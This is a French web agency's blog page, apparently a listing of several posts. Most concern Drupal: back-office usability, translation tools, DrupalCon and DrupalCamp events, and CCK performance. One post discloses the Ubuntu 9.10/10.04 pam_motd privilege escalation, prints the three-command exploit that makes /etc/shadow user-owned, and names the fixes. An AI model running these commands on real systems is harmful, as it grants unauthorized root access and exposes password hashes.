Blogs

Aujourd'hui, une faille de sécurité assez simple à mettre en oeuvre a été révélée. Elle n'impacte que la distribution Linux Ubuntu sur les versions 9.10 et 10.04.

Dès ce matin, nous avons pu constater qu'une mise à jour critique était disponible sur la distribution Ubuntu.

Celle-ci concerne donc ce problème de sécurité qui permet à n'importe quel utilisateur loggué sur la machine d'acquérir les droits du compte root (superadmin).

L'exploit se base sur une faiblesse du module pam_motd qui est intégré dans la chaine d'authentification.

Il est donc possible de simplement le retirer la pile pam via les fichiers de configuration ou de mettre à jour comme préconisé.

Je vous communique l'exploit à titre d'information:

Admettons que je sois loggué sur la machine sous l'utilisateur: franck

---

rm -rf ~/.cache

ln -s /etc/shadow ~/.cache

ssh localhost

---

Vous voila propriétaire du fichier /etc/shadow !

Ce qui vous permettra bien évidemment de récupérer l'accès root...

En auditant ou simplement en voyant récemment quelques sites réalisés par mes concurrents mais néanmoins concurrents sous drupal 6, une évidence m'a sauté au visage : le Back-Office contributeurs (webmasters, éditeurs, journalistes...) de la plupart des sites réalisés sous drupal n'est souvent pas à la hauteur du niveau fonctionnel du Front-Office. Je ne dis pas que c'est le cas de tous les projets sous drupal, mais le manque de temps (et surement de poste budgétaire), et/ou de connaissance de certains modules sur ces sites font qu'un super site se transforme en cauchemar à administrer pour le client, avec une interface soviétique à faire pâlir d'envie Youri Gagarine.

Forcément, drupal est réputé pour sa faible ergonomie par défaut, et cela fait les beaux jours des éternels trollsdébats sur la guerre des mondes Wordpress/Drupal, comme dans ce genre de manifestation où votre serviteur était présent (bien que flou).

On ne va pas verser dans l'émotion, ni dans le plan téléfilm américain avec nos épouses à nos côtés et le drapeau derrière nous, mais cela me fait quand même chaud au coeur de prendre 2 minutes pour se retourner et se dire : Waouh, déjà 9 ans qu'on fait de l'Open Source, et toute l'équipe est toujours aussi excitée à la sortie d'un nouveau module drupal ou à la découverte de nouvelles applications libres qui vont révolutionner le monde.

Et la chose dont je suis le plus fier aujourd'hui est que OWS ait réussi à grandir et évoluer tout en gardant ses valeurs fondatrices : le libre, le partage des connaissances (cf Cooletude , qui aura 10 ans d'existence bientôt), la conviction que le web est un marché porteur même dans les moments difficiles. Je suis de plus très fier de travailler avec toute l'équipe OWS, d'avoir des collaborateurs de si grande valeur humaine et professionnelle

</mode_discours_pdg>

Sinon désolé de notre silence qui commence à durer sur ces blogs, nous avons pas mal été occupés ces derniers temps mais on vous promet plein de nouveaux sites pour le printemps, nous n'avons pas chomé depuis.

Il fut un temps où avoir une interface d'un site drupal en français relevait du défi, à la fois humain et technologique (comment, où, avec quels outils....).

Rassurez-vous c'était un problème commun à toutes les versions non anglophones de drupal et sans la contribution de quelques volontaires passionnés et technophiles (dont votre serviteur), la traduction des modules drupal n'avançait pas beaucoup et n'était pas très ouverte.

Heureusement Gabor Hojtsy, un des core developpeur drupal, a lancé en septembre à l'occasion du DrupalCon Paris, une interface dédiées à la localisation (la traduction en langage informatique) de drupal et de ses modules. Bien que encore en version Beta et pouvant être encore amélioré, localize.drupal.org a connu un engouement mérité de la part de la communauté francophone, car proposant sur une seule interface web les fonctionnalités suivantes :

A force de conseiller ce lien à nos clients, je me suis demandé pourquoi je ne l'ai pas posté plus tôt sur ce blog :

Univers Netvibes Drupal

Il rassemble en une page (et plusieurs onglets) l'ensemble des outils et sources d'informations indispensables sur drupal, pour les développeurs mais aussi pour les utilisateurs : nouvelles sorties de modules, actualités des blogs influents, alertes de sécurité, forums....

Mis à part le flux deli.cio.us de OWS (le bloc en bas de la colonne droite des blogs OWS), je ne vois pas d'outil plus essentiel pour votre culture drupal :)

Nous étions présent au drupalcamp de Vienne les 27 et 28 novembre où de nombreuses sessions ont eu lieu. Il est à noter l'arrivée de MongoDb dans drupal. L'organisation était admirable dans les locaux de l'université de technologie de Vienne au centre ville. Les photos sont disponibles sur Flickr!. Pour OWS, pas de présentation cette fois ci mais des liens renforcés dans la communauté drupal. Quelques liens glanés pendant les présentations :

• L'outil de présentation prezi.com
• un site présentant des palettes de couleurs : colorlovers
• l'outil de management de projet openatrium
  

Petite photo de l'équipe OWS présente au DC Paris 2009, nostalgie :

( Le petit garçon ne code pas encore de hook )

Sans oublier The Swag issu du sponsoring OWS !

Un grand merci à Vincent Bidaux pour le design : http://vincent.polenordstudio.fr/snafu/

Si vous souhaitez un exemplaire, contactez-nous !

De retour dans la vraie vie après une semaine de festivités drupaliennes qui m'ont laissé un excés d'enthousisame communicatif qui est parti pour durer.

Mais qu'en ai-je retenu ? Honnêtement, que des bonnes choses, que je vous livre ci-dessous en vrac mais ça traduit bien l'énorme bénéfice que toute la communauté à tiré de ce DrupalCon Paris 2009

J-1 avant l'évènement que nous attendions tous, OWS est dans les starting block !
Tout d'abord, nous vous avons concocté une petit surprise incluse dans le bag que vous recevrez lors de votre arrivée à la Cité Internationale Universitaire.

Ensuite pour nous retrouver, nous serons présent le premier jour ( mardi 1er septembre 2009 13h ) au 4ème drupalcamp Paris, mais également en piste pour les diverses conférences tout au long de cet évènement.
Enfin nous vous proposerons une dégustation de vin et de charcuterie/fromage bien français le jeudi 3 septembre 2009 à 12h, Pour l'emplacement je compte sur votre odorat ! (Contactez-nous car les places sont chères)

Á OWS, nous sommes de grands amateurs de la flexibilité qu'amène CCK, mais nous n'étions pas totalement sur de nous lorsqu'il a fallu décider de l'utiliser ou pas dans un projet nécessitant 5 à 10 champs supplémentaires par type de contenu, évidement avec un fort traffic pour pimenter un peu la chose. Pour pouvoir prendre une décision éclairée, plutôt qu'un raisonnement purement théorique, nous avons décidé de mesurer concrètement ce qu'il en était, en vérifiant l'influence du nombre de champs CCK sur le temps de chargement.